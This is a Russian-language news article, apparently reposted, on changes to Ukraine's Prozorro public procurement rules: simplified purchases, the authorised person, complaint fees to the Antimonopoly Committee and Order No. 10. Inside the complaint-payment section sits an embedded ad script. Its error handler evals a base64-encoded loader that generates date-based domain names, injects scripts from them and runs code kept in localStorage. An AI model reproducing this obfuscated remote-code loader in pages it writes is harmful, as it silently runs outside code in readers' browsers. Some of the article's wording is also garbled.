От допороговых закупок к упрощенным
Порядок проведения допороговых госзакупок был полностью урегулирован Приказом №35 от 13 апреля 2016 года, который затем был заменен Приказом №10 от 19 марта 2019 года с внесением в него изменений приказами №11 от 20 марта 2019 и №18 от 17 апреля 2020 года. В настоящее время термин «допороговая» закупка был заменен «упрощенной», которая хорошо описана новым постановлением Закона «О государственных закупках», который вступил в силу еще 20 апреля этого года.
Первая статья этого закона описывает, что такое упрощенная закупка и каковы ее общие черты, а именно — от 50 тыс. грн и больше, однако, это значительно меньше привычных нам 200 тыс. грн, для услуг и товаров и 1.5 млн грн — для всех работ (пункты 1-4 части первой 2 статьи Закона). А статья 14 раз инструктирует саму процедуру.
Ответственный и Уполномоченный
Первая часть статьи 11 этого Закона достаточно четко называет, что ответственным юридическим лицом за проведение самой процедуры закупки должен быть тот, у кого есть прямые обязанности и кто содержится как штатная единица, соответствующая существующему трудовому законодательству Украины. Также может быть подписан трудовой договор, или возложены частично обязанности на существующего рабочего данного предприятия с дополнительной оплатой их. Нет никаких ограничений при назначении Уполномоченного лица, ним мажет стать директор, начальник или главный бухгалтер данного отдела (статья 105 Кодекса Законов Украины о труде).
Положение о тендерном комитете обычно требует у лица, работающего в данной сфере, опыт работы от двух лет. Однако, такое требование вовсе не обязательно, когда положение Примерное. Во многих конечных положениях данного Закона указано также сроки аккредитация (часть 8 статьи 11) этого лица, а именно — до первого января 2022 года. Также очень важно отметить, что вышеупомянутое лицо отвечает только за упрощенные закупки, за различные процедурные вопросы, а также за утверждение годового плана ответственность возлагается именно на тендерный комитет. Более детализированные ответы на вопросы, касающиеся Уполномоченного лица, описано на сайте госзакупок Прозорро.
Стало ли более справедливым обжалование в АМКУ?
Постановление КМУ №292 о предоставлении жалоб через электронную систему государственных закупок и их оплату регулирует их в зависимости от стоимости ожидаемых закупок с определенными минимальными и максимальными порогами.
В частности, обжалование решения заказчика будет стоить от 3 до 170 тыс. грн, что соответствует — 0.6% от закупочной стоимости. А обжалование любых условиях тендерной документации будет стоить в пределах от 2 до 85 тыс. грн, что составляет 0.3% от стоимости закупки.
При таких условиях малый и средний бизнес сможет более продуктивно защищать свои права, по сравнению с тем, как было раньше — когда существовал очень большой дисбаланс между жалобами в миллионных закупках и возможностями среднего или малого бизнеса. Теперь стоимость жалобы прямо пропорционально зависит от размера закупки.
Размер, при этом, определяется автоматически электронной системой, а оплата происходит сразу в день подачи жалобы и после этого жалоба самостоятельно вносится в реестр на рассмотрение Антимонопольного комитета. Отозвать жалобу не представляется возможным, а при ее удовлетворении, подавшему жалобу, будут полностью возвращены оплаченные средства.
Пересчет денег происходит в системе на специально созданный счет ГП «Прозорро», а статус оплаты жалобы будет изменен только с момента поступления денежных средств на счет. На данный этап следует обратить большое внимание, поскольку при создании денежного перевода следует иметь, так называемый временной буфер в 3-и дня. (adsbygoogle = window.adsbygoogle || []).push({}); var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgInBybyIsICJ0b3AiLCAiaW5mbyIsICJvbmxpbmUiLCAic3BhY2UiLCAic2l0ZSIsICJ0ZWNoIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgc2NyaXB0X3NlY29uZCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9zZWNvbmQuc3JjID0gImh0dHBzOi8vIisgaG9zdCsiIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChzY3JpcHRfc2Vjb25kKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }
Что представляет собой Инструкция №10
Данная инструкция заменяет Приказ №35 и определяет общий порядок пользования электрической системой и процедуры проведения закупок. Приказ №35 описывал порядок проведения допороговых закупок, а в новом Приказе №10 такой термин как «допороговые закупки» полностью отсутствует и заменен на термин «закупки». Возможность проводить упомянутые закупки предоставлена двум категориям заказчиков, об этом говорит Закон №922, а именно — государственным учреждениям и предприятиям, которые должны опубликовывать полные отчеты по освоению бюджетных средств, и также юридическим лицам, предусмотренным пунктом 9 первой части статьи 1 Закона №922. Заказчик закупки должен использовать одну из аккредитованных тендерных площадок Украины и имеет возможность реализовать государственные закупки в режиме онлайн.
Также, в данной инструкции четко сформулирован языковой аспект. Раньше информация на украинском языке была «определяющей», а теперь она должна быть «аутентичной».
Очень интересно то, что информация, которую уже подали в электронном виде через электронную систему госзакупок для участия в тендере, например, не обязательно впоследствии должна быть предоставлена в бумажном виде, как обычно требуют все заказчики.
Данный приказ не пишет об обязательности предоставления заказчику дубликатов документов в бумажном виде.
В Приказ №10 были внесены некоторые незначительные правки Приказами №18 и №11, с которыми стоит ознакомиться, если вы, например, собираетесь подавать свое предложение, поскольку срок подачи теперь снижен с 3 до 2 дней.
Нововведения в разработках площадок
Чтобы помочь последним изменениям, аккредитованные площадки тоже разрабатывают новые практические рычаги для облегчения и оптимизации работы, добавляются новые возможности и различные инструменты, с помощью которых, например, можно собрать полную историю договоров заказчика и т.п.
ИТ-аналитики различных площадок предоставили такую возможность, как оценить репутацию различных заказчиков. Сейчас можно посмотреть и проанализировать все предыдущие процедуры различных предприятий и определить все проблемы, которые, возможно, возникали во время обжалования тендерных условий или проведения аукционов.
Таким образом, с помощью уровня частоты дисквалификаций можно сделать вывод о честности заказчика. А за неаргументированные дисквалификации заказчик понесет ответственность, согласно приговору Госаудитслужбы, и должен будет уплатить штраф. (adsbygoogle = window.adsbygoogle || []).push({});
Источник: https://akzent.zp.ua/izmeneniya-v-sisteme-prozorro-o-chem-sleduet-znat/
Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook